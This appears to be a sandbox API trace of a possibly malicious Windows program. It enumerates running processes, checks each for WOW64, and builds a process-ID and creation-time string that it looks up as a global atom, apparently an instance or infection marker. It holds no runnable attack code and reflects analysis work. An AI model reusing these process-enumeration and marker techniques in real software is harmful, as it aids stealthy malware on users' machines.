	[0126.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.415] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.415] CloseHandle (hObject=0x2dc) returned 1
	[0126.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.415] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.415] CloseHandle (hObject=0x2dc) returned 1
	[0126.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.416] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.416] CloseHandle (hObject=0x2dc) returned 1
	[0126.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.417] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.417] CloseHandle (hObject=0x2dc) returned 1
	[0126.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.417] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.417] CloseHandle (hObject=0x2dc) returned 1
	[0126.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.417] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.417] CloseHandle (hObject=0x2dc) returned 1
	[0126.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.418] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.418] CloseHandle (hObject=0x2dc) returned 1
	[0126.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.418] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.418] CloseHandle (hObject=0x2dc) returned 1
	[0126.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.419] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.419] CloseHandle (hObject=0x2dc) returned 1
	[0126.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.419] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.420] CloseHandle (hObject=0x2dc) returned 1
	[0126.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.420] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.420] CloseHandle (hObject=0x2dc) returned 1
	[0126.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.420] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.420] CloseHandle (hObject=0x2dc) returned 1
	[0126.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.421] CloseHandle (hObject=0x2dc) returned 1
	[0126.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.421] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.421] CloseHandle (hObject=0x2dc) returned 1
	[0126.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.422] CloseHandle (hObject=0x2dc) returned 1
	[0126.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.422] CloseHandle (hObject=0x2dc) returned 1
	[0126.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.422] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.423] CloseHandle (hObject=0x2dc) returned 1
	[0126.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.423] CloseHandle (hObject=0x2dc) returned 1
	[0126.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.423] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.423] CloseHandle (hObject=0x2dc) returned 1
	[0126.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.424] CloseHandle (hObject=0x2dc) returned 1
	[0126.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.424] CloseHandle (hObject=0x2dc) returned 1
	[0126.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.425] CloseHandle (hObject=0x2dc) returned 1
	[0126.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.425] CloseHandle (hObject=0x2dc) returned 1
	[0126.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.425] CloseHandle (hObject=0x2dc) returned 1
	[0126.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.426] CloseHandle (hObject=0x2dc) returned 1
	[0126.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.426] CloseHandle (hObject=0x2dc) returned 1
	[0126.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.427] CloseHandle (hObject=0x2dc) returned 1
	[0126.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.427] CloseHandle (hObject=0x2dc) returned 1
	[0126.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.427] CloseHandle (hObject=0x2dc) returned 1
	[0126.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.428] CloseHandle (hObject=0x2dc) returned 1
	[0126.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.428] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.429] GetLastError () returned 0x5
	[0126.430] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.430] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.430] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.430] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.431] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetLastError () returned 0x5
	[0126.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.433] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.433] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.433] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.433] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.433] CloseHandle (hObject=0x2dc) returned 1
	[0126.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.434] CloseHandle (hObject=0x2dc) returned 1
	[0126.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.434] CloseHandle (hObject=0x2dc) returned 1
	[0126.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.435] CloseHandle (hObject=0x2dc) returned 1
	[0126.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.435] CloseHandle (hObject=0x2dc) returned 1
	[0126.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.435] CloseHandle (hObject=0x2dc) returned 1
	[0126.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
